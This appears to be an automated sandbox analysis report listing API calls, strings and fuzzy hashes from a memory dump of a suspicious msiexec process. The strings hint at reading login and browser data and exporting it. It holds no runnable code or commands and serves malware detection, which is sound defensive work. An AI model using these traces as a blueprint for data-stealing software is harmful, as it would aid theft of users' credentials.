                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                    • String ID: sysdatetimepick32
                                                                    • API String ID: 1028950076-4169760276
                                                                    • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                    • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                    • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                    • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                    APIs
                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                    • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                    • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                    • memset.MSVCRT ref: 0041BA3D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset
                                                                    • String ID: -journal$-wal
                                                                    • API String ID: 438689982-2894717839
                                                                    • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                    • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                    • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                    • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                    • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                    • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                      • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                      • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                    • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Item$Dialog$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3975816621-0
                                                                    • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                    • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                    • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                    • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
APIs
• _wcsicmp.MSVCRT ref: 00444D09
• _wcsicmp.MSVCRT ref: 00444D1E
• _wcsicmp.MSVCRT ref: 00444D33
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: _wcsicmp$wcslen$_memicmp
• String ID: .save$http://$https://$log profile$signIn
• API String ID: 1214746602-2708368587
APIs
• ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
• ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
• ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
• memset.MSVCRT ref: 00405E33
• ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
• InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
• SetFocus.USER32(?,?,?,?), ref: 00405EB8
• ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
Memory Dump Source
• Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@$??3@$FocusInvalidateRectmemset
• String ID:
• API String ID: 2313361498-0
APIs
• GetClientRect.USER32(?,?), ref: 00405F65
• GetWindow.USER32(?,00000005), ref: 00405F7D
• GetWindow.USER32(00000000), ref: 00405F80
  • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
• GetWindow.USER32(00000000,00000002), ref: 00405F8C
• GetDlgItem.USER32(?,0000040C), ref: 00405FA2
• SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
• GetDlgItem.USER32(?,0000040E), ref: 00405FEB
• SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
Memory Dump Source
• Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: Window$ItemMessageRectSend$Client
• String ID:
• API String ID: 2047574939-0
APIs
• GetSystemTime.KERNEL32(?), ref: 00418836
• memcpy.MSVCRT(?,?,00000010), ref: 00418845
• GetCurrentProcessId.KERNEL32 ref: 00418856
• memcpy.MSVCRT(?,?,00000004), ref: 00418869
• GetTickCount.KERNEL32 ref: 0041887D
• memcpy.MSVCRT(?,?,00000004), ref: 00418890
• QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
• memcpy.MSVCRT(?,?,00000008), ref: 004188B6
Memory Dump Source
• Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
• String ID:
• API String ID: 4218492932-0
APIs
  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
• memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
• memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
• memcpy.MSVCRT(?,?,00000040), ref: 0044A988
  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
• memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
• memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
• memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$memset
• String ID: gj
• API String ID: 438689982-4203073231
APIs
• memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy
• String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
• API String ID: 3510742995-2446657581
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00405A25
• SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
• SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
• SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
• memset.MSVCRT ref: 00405ABB
• SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
• SetFocus.USER32(?), ref: 00405B76
Memory Dump Source
• Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: MessageSend$FocusItemmemset
• String ID:
• API String ID: 4281309102-0
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: _snwprintfwcscat
• String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
• API String ID: 384018552-4153097237
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: ItemMenu$CountInfomemsetwcschr
• String ID: 0$6
• API String ID: 2029023288-3849865405
APIs
  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
• memset.MSVCRT ref: 00405455
• memset.MSVCRT ref: 0040546C
• memset.MSVCRT ref: 00405483
• memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
• memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memset$memcpy$ErrorLast
• String ID: 6$\
• API String ID: 404372293-1284684873
APIs
Memory Dump Source
• Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: AttributesErrorFileLastSleep$free
• String ID:
• API String ID: 1470729244-0
APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
• GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
• GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
• wcscpy.MSVCRT ref: 0040A0D9
• wcscat.MSVCRT ref: 0040A0E6
• wcscat.MSVCRT ref: 0040A0F5
• wcscpy.MSVCRT ref: 0040A107
Memory Dump Source
• Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: Time$Formatwcscatwcscpy$DateFileSystem
• String ID:
• API String ID: 1331804452-0
APIs
  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 00404398
• GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
• GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
• GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
• GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
• String ID: advapi32.dll
• API String ID: 2012295524-4050573280
APIs
Strings
• <?xml version="1.0" ?>, xrefs: 0041007C
• <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
• <%s>, xrefs: 004100A6
Memory Dump Source
• Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memset$_snwprintf
• String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
• API String ID: 3473751417-2880344631
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: wcscat$_snwprintfmemset
• String ID: %2.2X
• API String ID: 2521778956-791839006
                                                                    • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                    • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                    • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                    • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintfwcscpy
                                                                    • String ID: dialog_%d$general$menu_%d$strings
                                                                    • API String ID: 999028693-502967061
                                                                    • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                    • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                    • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                    • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                    APIs
                                                                    • strlen.MSVCRT ref: 00408DFA
                                                                      • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                    • memset.MSVCRT ref: 00408E46
                                                                    • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                    • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                    • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                    • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memsetstrlen
                                                                    • String ID:
                                                                    • API String ID: 2350177629-0
                                                                    • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                    • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                    • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                    • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                    • API String ID: 2221118986-1606337402
                                                                    • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                    • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                    • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                    • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                    APIs
                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                    • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                    • memset.MSVCRT ref: 00408FD4
                                                                    • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                    • memset.MSVCRT ref: 00409042
                                                                    • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                      • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                    • String ID:
                                                                    • API String ID: 265355444-0
                                                                    • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                    • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                    • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                    • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004116FF
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                      • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                    • API String ID: 2618321458-3614832568
                                                                    • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                    • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                    • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                    • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFilefreememset
                                                                    • String ID:
                                                                    • API String ID: 2507021081-0
                                                                    • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                    • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                    • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                    • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                    APIs
                                                                    • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                    • malloc.MSVCRT ref: 00417524
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                    • free.MSVCRT ref: 00417544
                                                                    • free.MSVCRT ref: 00417562
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                    • String ID:
                                                                    • API String ID: 4131324427-0
                                                                    • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                    • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                    • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                    • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                    • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                    • free.MSVCRT ref: 0041822B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: PathTemp$free
                                                                    • String ID: %s\etilqs_$etilqs_
                                                                    • API String ID: 924794160-1420421710
                                                                    • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                    • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                    • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                    • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040FDD5
                                                                      • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,<,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                    • _snwprintf.MSVCRT ref: 0040FE1F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                    • API String ID: 1775345501-2769808009
                                                                    • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                    • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                    • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                    • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastMessage_snwprintf
                                                                    • String ID: Error$Error %d: %s
                                                                    • API String ID: 313946961-1552265934
                                                                    • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                    • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                    • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                    • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: foreign key constraint failed$new$oid$old
                                                                    • API String ID: 0-1953309616
                                                                    • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
